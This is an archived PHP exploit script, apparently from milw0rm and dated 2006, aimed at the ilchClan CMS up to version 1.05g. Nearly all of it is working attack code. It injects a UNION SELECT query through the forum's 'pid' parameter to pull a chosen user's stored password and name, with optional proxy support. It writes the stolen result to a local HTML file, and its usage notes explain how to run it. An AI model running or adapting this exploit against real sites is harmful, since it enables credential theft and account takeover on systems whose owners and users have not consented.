ilchClan <= 1.05g (tid) Remote SQL Injection Exploit

&#60;? error_reporting(E_ERROR); function xss_init() { if (!extension_loaded(&#39;php_curl&#39;)) { if (!dl(&#39;curl.so&#39;) and !dl(&#39;php_curl.so&#39;) and !dl(&#39;php_curl.dll&#39;)) die (&#34;oo error - cannot load curl extension!&#34;); } } function xss_header() { echo &#34;\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo&#34;; echo &#34; oo ooooooo ooooooo\n&#34;; echo &#34; oooo oooo o888 o88 888 o888 888o\n&#34;; echo &#34; 888o888 888 o888 888888888\n&#34;; echo &#34; o88888o 888 o888 o 888o o888\n&#34;; echo &#34; o88o o88o o888o o8888oooo88 88ooo88\n&#34;; echo &#34;oooooooooooooooooooooooooooooo bxcp 0.299 exploit oooooooooooooooooooooooooooooo\n&#34;; echo &#34;oo usage $ php ilchclan-105g-exploit.php [url] [post id] [user id]\n&#34;; echo &#34;oo proxy support $ php ilchclan-105g-exploit.php [url] [post id] [user id]\n&#34;; echo &#34; [proxy]:[port]\n&#34;; echo &#34;oo [post id] id of a post in the forum where a guest have the permission\n&#34;; echo &#34; to write a reply with a quote\n&#34;; echo &#34;oo example $ php ilchclan-105g-exploit.php http://localhost 1 1\n&#34;; echo &#34;oo open the file ilchclan_pw.html - there you find the password of the user\n\n&#34;; } function xss_bottom() { echo &#34;\noo discover : x128 - alexander wilhelm - 21/02/2006\n&#34;; echo &#34;oo contact : exploit &#60;at&#62; x128.net oo website : www.x128.net&#34;; } function xss_exploit() { $xss_target = $_SERVER[&#39;argv&#39;][1] . &#34;/index.php&#34;; $xss_http_get = &#34;?m=forum&um=newpost&tid=&#34; . $_SERVER[&#39;argv&#39;][2] . &#34;&pid=&#34; . urlencode(&#34;0 UNION SELECT pass, name FROM prefix_user WHERE id = &#34;. $_SERVER[&#39;argv&#39;][3] .&#34;/*&#34;); $xss_connection = curl_init(); if ($_SERVER[&#39;argv&#39;][4]) { curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8); curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER[&#39;argv&#39;][4]); } curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get); curl_setopt ($xss_connection, CURLOPT_HEADER, 0); curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($xss_connection, CURLOPT_USERAGENT, &#39;x128&#39;); $xss_source = curl_exec($xss_connection) or die(&#34;oo error - cannot connect!\n&#34;); if ($xss_source) echo &#34;oo dafaced ...\n&#34;; $xss_output = fopen(&#34;ilchclan_pw.html&#34;,&#34;w&#34;); fputs($xss_output, $xss_source); fclose($xss_output); curl_close ($xss_connection); } xss_init(); xss_header(); xss_exploit(); xss_bottom(); ?&#62; # milw0rm.com [2006-02-20]